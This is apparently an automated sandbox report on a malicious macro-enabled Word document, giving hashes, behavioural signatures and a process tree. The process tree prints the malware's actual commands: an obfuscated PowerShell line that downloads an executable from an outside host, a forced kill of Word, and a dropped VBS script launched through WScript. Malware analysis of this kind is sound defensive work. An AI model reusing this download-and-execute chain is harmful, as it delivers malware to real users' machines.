Analysis

  • max time kernel: 71s
  • max time network: 137s
  • platform: windows10-2004_x64
  • resource: win10v2004-20220414-en
  • submitted: 21-05-2022 03:39

General

  • Target: 2020_1844777494.docm
  • Size: 380KB
  • MD5: bbea719b296b81cb70e294246c9d6eae
  • SHA1: d79c7c9a0ddc7d3c7d90eb90f47783e999bb7ebd
  • SHA256: 99d22eb3d584f502292d847497713c8db10f7aa9d2b08f5f6da8e690be4f7832
  • SHA512: 40d7d306bfc8fad85f82d7f3fe9b5baec403a953178bf8284043afcb136b2356084151ded8f1e5c75aaa480e30a2aad0235adea09fdf4fffb7341d5890c67d17

Score
10/10

Malware Config

  • Extracted
    • Language: ps1
    • Deobfuscated
    • URLs (exe.dropper): http://werfpop.nl/client.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020_1844777494.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3196
    • C:\Windows\explorer.exe
      explorer.exe C:\ProgramData\Portes.vbs
      2⤵
      • Process spawned unexpected child process
      PID:3700
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3632
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Game_Lods\Groters.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1960
        • C:\Windows\system32\taskkill.exe
          Taskkill /IM "winword.exe" /F
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://werfpop.nl/client.exe', 'C:\Game_Lods\Kritos.exe')
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4204
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:1112

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery
    • Query Registry (3) T1012
    • System Information Discovery (4) T1082

Downloads

  • C:\Game_Lods\Groters.cmd
    Filesize: 4KB
    MD5: 0113834f9f390e12db3057891516f47d
    SHA1: 9c7e3a611586726c18f33ca668ce8c8e8ffc2919
    SHA256: 6231b5b04cb2708b8b8446536de8df99391da90bc77449589ab0e5b7660738e6
    SHA512: 0cd634772edb38f33222bc8654257f0959a063fcf5f8cea59d10a4b106746855dfcb974420e3729088e082d71f57e712a17b599ca69b06a0674b531358769fef

  • C:\ProgramData\Nolewr.vbs
    Filesize: 358B
    MD5: c16098d503816c750a2b4ce0b179798f
    SHA1: e0a6368150f802e5ece6558b2693fa4ca8eeb4b8
    SHA256: 8ba6c20c21eb3a74998f53f1f7d8aa1a139a98c7413ce7bcb3052280f75b3f7d
    SHA512: e3ca2ce1cc04b37b861489dd1fd21575efe261b436bb29eeed8653f0b5558ac902c8c0f7596bbae91b28854946597da5b385d0614edbf1e8755b955bed698929

  • C:\ProgramData\Portes.vbs
    Filesize: 68KB
    MD5: 633d05bd06f41c9aa4281baa46ce38e4
    SHA1: 056a5a05108edbedde196098e07553c5c201368f
    SHA256: a478b1ba294dee526fdf1986402d5e387151394525cc5f523026183197672a77
    SHA512: 268f61d20235696295481651ce70c20164ce4a16f6b6ae4b3e14d86f9e2743904db19e05810991f5928e3e82b08a11a9355a18d711309e1eef118047467a3c7a

  • memory/540-141-0x0000000000000000-mapping.dmp
  • memory/760-148-0x0000000000000000-mapping.dmp
  • memory/1112-152-0x0000000000000000-mapping.dmp
  • memory/1960-146-0x0000000000000000-mapping.dmp
  • memory/3196-130-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3196-145-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3196-136-0x00007FFA871C0000-0x00007FFA871D0000-memory.dmp
    Filesize: 64KB
  • memory/3196-135-0x00007FFA871C0000-0x00007FFA871D0000-memory.dmp
    Filesize: 64KB
  • memory/3196-137-0x00000292BD920000-0x00000292BD924000-memory.dmp
    Filesize: 16KB
  • memory/3196-143-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3196-131-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3196-144-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3196-142-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3196-134-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3196-133-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3196-132-0x00007FFA89350000-0x00007FFA89360000-memory.dmp
    Filesize: 64KB
  • memory/3700-138-0x0000000000000000-mapping.dmp
  • memory/4204-150-0x00000220F3970000-0x00000220F3992000-memory.dmp
    Filesize: 136KB
  • memory/4204-151-0x00007FFAAA920000-0x00007FFAAB3E1000-memory.dmp
    Filesize: 10.8MB
  • memory/4204-149-0x0000000000000000-mapping.dmp